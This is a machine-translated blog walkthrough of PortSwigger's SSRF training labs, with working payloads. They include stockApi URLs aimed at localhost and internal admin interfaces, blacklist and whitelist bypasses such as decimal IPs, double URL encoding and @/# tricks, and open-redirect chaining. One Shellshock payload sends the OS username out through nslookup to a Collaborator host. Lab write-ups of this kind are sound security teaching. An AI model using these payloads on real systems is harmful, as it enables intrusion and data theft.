当前位置:网站首页>Learn SSRF through portwigge's web security vulnerability training platform

Learn SSRF through portwigge's web security vulnerability training platform

2020-11-10 14:03:29 week

Preface

Portswigger yes Burpsuite Its official website , It's also a very good vulnerability training platform . Its Web The safe range address is :https://portswigger.net/web-security/

The training content of the range focuses on Burpsuite Deep excavation of various functions , This is also 《 The classic of hacker attack and Defense Technology Web Actual combat 》 The actual training platform of , With the use of learning effect is better .

This is just for the SSRF Loophole range , For a complete interpretation .

SSRF Vulnerability profile

Server side Request Forgery (SSRF) It's a kind of web Security vulnerabilities , It allows attackers to induce server-side applications to issue HTTP request .

In a typical SSRF Example , An attacker could cause the server to connect back to itself , Or other links to this organization based on web Service for , Or connect to an external third-party system .

SSRF The impact of the attack

The success of SSRF Attacks usually result in unauthorized operations or access to data within the organization on the vulnerable application itself or other back-end systems that can communicate with the application . In some cases ,SSRF The vulnerability may allow an attacker to execute arbitrary commands .

common SSRF attack

SSRF Attacks often use trust relationships to escalate attacks from vulnerable applications and perform unauthorized operations . These trust relationships may be related to the server itself , Or with other back-end systems in the same organization .

For the server itself SSRF attack

Introduction to loopholes

On the server itself SSRF In attack , An attacker induces an application to issue HTTP request . This usually includes providing a URL, such as 127.0.0.1 or localhost.

for example , Consider a shopping app , The app allows users to see if there is stock in a store . To provide inventory information , The application must query various back ends based on the products and stores involved REST API. The function is to use the URL Through the front end HTTP The request is passed to the relevant back end API Endpoint to implement . therefore , When a user looks at the inventory status of an item , Their browser will make the following request :

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

This causes the server to specify URL Request , Retrieve inventory status , And return it to the user .

under these circumstances , An attacker can modify the request to specify a server local URL. for example :

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin

ad locum , The server will get /admin And return it to the user .

Of course , Now attackers can directly access /admin. But administrative functions are usually accessible only to appropriately authenticated users . therefore , Direct access URL 's attacker will not see anything of interest . however , When the /admin URL When the request for is from the local computer itself , Will bypass normal access control . The application grants full access to administrative functions , Because the request seems to come from a trusted location .

Lab: Basic SSRF against the local server

Address :https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost

Introduction to shooting range :

This range has an inventory check function , Data can be obtained from internal systems .

To clear the range , Please change the inventory check of URL To access the management interface http://localhost/admin And delete the user carlos.

Range clearance :

Click on Access the lab Enter the range .

Click on Check stock Grab the bag

 

modify stockApi The content is :http://locathost/admin

 

Then click delete carlos user , Grab the bag , Get the delete target user's URL:

http://localhost/admin/delete?username=carlos

 

take stockApi The parameter is modified to this URL that will do

 

 

 

The reason for the leak

Why applications run this way , And implicitly trust requests from the local machine ? There are many reasons for this :

(1)     Access control checks may be implemented in different components in front of the application server . When the connection returns to the server itself , It's going to bypass the inspection .

(2)     For disaster recovery purposes , The application may allow any user from the local computer to have administrative access without logging in . This provides a way for administrators to recover the system in case of loss of credentials . The assumption here is , Only fully trusted users come directly from the server itself

(3)     The port number that the management interface may listen to is different from that of the main application , So users may not have direct access to .

This relationship of trust ( Requests from local machines are handled differently from normal requests ) Often make SSRF Become a serious loophole .

 

SSRF Attacks on other back-end systems

Introduction to loopholes

Another trust relationship that often occurs in server-side request forgery is , The application server can interact with other back-end systems that users cannot directly access . These systems usually have non routable private IP Address . Because the back-end system is usually protected by the network topology , So they are usually less secure . in many instances , The internal back-end system contains sensitive functions , Anyone who can interact with the system can access these functions without authentication .

In the previous example , Suppose at the back end URL https://192.168.0.68/admin There's a management interface in . ad locum , The following requests can be submitted by an attacker , utilize SSRF Vulnerability access management interface :

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://192.168.0.68/admin

Lab: Basic SSRF against another back-end system

Address :https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system

Introduction to shooting range :

The range has inventory check function , Data can be obtained from internal systems .

To clear the range , Please use the inventory check function to scan the internal 192.168.0.X Range , To find the port 8080 Management interface on , And then use it to delete users carlos.

Range clearance :

Click on Access the lab Enter the range .

Click on Check stock Grab the bag , Send to Intruder

 

Set up payload, run 192.168.0.0/24 This C Part of the 8080 port

 

Find a status of 200 Response package for , This is the management interface

 

Then click delete carlos user , Grab the bag , Get the delete target user's URL:

http://192.168.0.205:8080/admin/delete?username=carlos

take stockApi The parameter is modified to this URL that will do

 

Bypass the common SSRF Defensive measures

contain SSRF It is common for behavioral applications to appear with defenses designed to prevent malicious exploitation . Usually , These defenses can be bypassed .

SSRF Attack bypasses blacklist based input filters

Introduction to loopholes

Some applications block inclusion of host names ( Such as 127.0.0.1 and localhost) Or sensitive url ( Such as /admin) The input of . under these circumstances , We can usually bypass filters with :

(1) Use 127.0.0.1 An alternative IP Express , for example :2130706433(10 Base number ip)、017700000001(8 Base number ip)、127.1( short ip)

(2) Register your own domain name , It can be interpreted as 127.0.0.1

(3) Use URL Encoding or case changes bypass

Lab: SSRF with blacklist-based input filter

Address :https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter

Introduction to shooting range :

This range has an inventory check function , Data can be obtained from internal systems .

To clear the range , Please change the inventory check of URL To access the management interface http://localhost/admin And delete the user carlos

Developers have deployed two weak anti SSRF defense , You need to bypass these defenses .

Range clearance :

Click on Access the lab Enter the range .

Click on Check stock Grab the bag , Send to Repeater

take stockApi In the parameter URL Change to http://127.0.0.1/, Discovery request blocked .

 

take 127.0.0.1 Change it to 2130706433 You can bypass

 

take URL Change to http://2130706433/admin, The discovery was stopped again .

 

The character a Do it twice url Code to get %2561, Or use A replace a, You can bypass

 

take stockApi In the parameter URL Change to http://2130706433/%2561dmin/delete?username=carlos You can delete carlos user

 

SSRF Attack bypasses whitelist based input filters

Introduction to loopholes

Some applications only allow matching input that starts with a whitelist of allowed values or contains those values . under these circumstances , Sometimes by using URL Parsing inconsistencies to bypass filtering .

URL The specification contains a lot of implementation URL Specific features that are easily overlooked when parsing and validating :

(1)     You can use @ Characters before the host name URL Embedded credentials in . for example :  

https://expected-host@evil-host

(2)     You can use # Character to indicate URL fragment . for example :

https://evil-host#expected-host

(3)     You can use DNS Named hierarchies put the required input into a standard that you control DNS In the name . for example :

https://expected-host.evil-host

(4)     You can url Code characters to confuse url Parsing code . If you implement code processing for filters url The way of encoding characters and processing back end HTTP The requested code is different , So this is particularly useful

Lab: SSRF with whitelist-based input filter

Address :https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter

Introduction to shooting range :

This range has an inventory check function , Data can be obtained from internal systems .

To clear the range , Please change the inventory check of URL To access the management interface http://localhost/admin And delete the user carlos

Developers have deployed the anti SSRF defense .

Range clearance :

Click on Access the lab Enter the range

Click on Check stock Grab the bag , Send to Repeater

take stockApi In the parameter URL Change to http://127.0.0.1/ , Discovery request blocked , Tell us the host name must be stock.weliketoshop.net

 

Use @ Characters can bypass

 

add to #, And then the request was blocked , Tell us the host name must be stock.weliketoshop.net

 

take # Do it twice url code , To bypass

http://127.0.0.1:80%2523@stock.weliketoshop.net

 

Last , visit

http://127.0.0.1:80%2523@stock.weliketoshop.net/admin/delete?username=carlos

You can delete the target user

 

Bypass by open redirection SSRF filter

Introduction to loopholes

Exploit vulnerability through redirection , Sometimes you can bypass any type of filter based defense . In front of SSRF Example , Suppose the user submitted URL After strict verification , To prevent malicious use of SSRF Behavior . however , allow url , contains an open redirection vulnerability . If used to generate the backend HTTP Requested API Support redirection , You can construct a URL, And direct the redirection request to the required back-end target .

for example , Suppose the application contains an open redirection vulnerability , Its URL as follows :

/product/nextProduct?currentProductId=6&path=http://evil-user.net

Return to redirect to :

http://evil-user.net

You can use the open redirection vulnerability to bypass URL filter , utilize SSRF The loopholes are as follows :

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin

This SSRF The reason why loopholes work , Because the application first validates the provided stockAPI URL Whether it is on the allowed domain ( In fact it is ). then , The application requests to provide URL, This will trigger an open redirection . It follows redirection , And to the attacker's chosen interior URL Request .

Lab: SSRF with filter bypass via open redirection vulnerability

Address :https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection

Introduction to shooting range :

This range has an inventory check function , Data can be obtained from internal systems .

To clear the range , Please change the inventory check of URL To access the management interface http://192.168.0.12:8080/admin  And delete the user carlos

The inventory checker is restricted to local applications only , So you need to first find an open redirection that affects the application .

Range clearance :

Click on Access the lab Enter the range

Click on Check stock Grab the bag , Send to Repeater

 

It was observed that it was not possible for the server to publish requests directly to other hosts

single click “Next product”, And then observed path Parameter has been placed in the Location In the head , This leads to open redirection

 

Create an open redirection vulnerability URL, And redirect to the management interface , And input it into stockApi Parameters

/product/nextProduct?path=http://192.168.0.12:8080/admin

 

The inventory checker follows the redirection and displays the administration page . below , We can modify the path to delete the target user

/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

 

Blind SSRF Loophole

Blind SSRF brief introduction

When an application is induced to provide URL Send back end HTTP request , But when the response to the back-end request is not returned in the front-end response of the application , Will appear Blind SSRF Loophole .

Blind SSRF It's usually harder to use , But sometimes it can lead to code execution remotely on the server or other back-end components .

because Blind SSRF The unidirectional nature of vulnerability , The effect is usually greater than conventional SSRF Low vulnerability . Although they can be used for remote code execution in some cases , But you can't easily use them to retrieve sensitive data from back-end systems

How to discover and use Blind SSRF Loophole

testing Blind SSRF The most reliable way to exploit a vulnerability is to use out of band (OAST) technology . This involves trying to trigger... On an external system that you control HTTP request , And monitor the network interaction with the system .

The easiest way to use out of band technology , The most effective way is to use Burp Collaborator. You can use Burp Collaborator The client generates a unique domain name , Regard it as payload Send to the application , And monitor any interaction with these domains . If you observe incoming from the application HTTP request , So it's very likely to exist SSRF Loophole .

Lab: Blind SSRF with out-of-band detection

Address :https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection

Introduction to shooting range :

The site uses analysis software , The software will get the product page when loading Referer Specified in the header URL.

To clear the range , Please use this function to public Burp Collaborator The server sends out HTTP request .

Range clearance :

Click on Access the lab Enter the range

Visit the product , stay Burp Suite Intercept requests in , And then send it to Burp Repeater

start-up Burp Collaborator client

 

Click on "Copy to clipboard", And make Burp Collaborator The client window remains open .

 

change Referer header , To use the generated Burp Collaborator Field instead of the original field . Send a request .

 

Back to Burp Collaborator Client window , And then click “Poll now”. If there's no interaction , Please wait a few seconds , And then try again , Because server-side commands are executed asynchronously .

 

Lab: Blind SSRF with Shellshock exploitation

Address :https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation

Introduction to shooting range :

The site uses analysis software , The software will get the product page when loading Referer Specified in the header URL.

To clear the range , Please use this function to 192.168.0.X The internal server in the Blind SSRF attack . In the attack , Use... For internal servers Shellshock Payload , Through public Burp Collaborator Server leaks OS User name .

Range clearance :

Burp Install in ”Collaborator Everywhere” Expand

 

Add the target's domain to Burp Suite Of scope in , In order to Collaborator Everywhere Position it as a target .

 

Browse the site . Please note that , When loading the product page , It will pass. User-Agent and Referer Head trigger and Burp Collaborator Of HTTP Interaction .

 

Send a request to browse the product page to Burp Intruder.

 

Use Burp Collaborator The client generates unique Burp Collaborator Payload , And put it in the following Shellshock In the payload :

() { :; }; /usr/bin/nslookup $(whoami).YOUR-SUBDOMAIN-HERE.burpcollaborator.net

take Burp Intruder In the request User-Agent Replace the string with your Collaborator Domain Shellshock Payload .

then Burp Intruder In the request Referer Replace the string with http://192.168.0.X:8080

 

 

 

When the configuration is complete , Click Start attack

 

After the attack , return Burp Collaborator Client window , And then click “Poll now”. If no interactions are listed , Please wait a few seconds , And then try again , Because server-side commands are executed asynchronously .

after , We see a back-end system initiated DNS Interaction , The back-end system has been successfully Blind SSRF attack . The name of the operating system user appears in DNS Subdomain .

 

版权声明
本文为[week]所创,转载请带上原文链接,感谢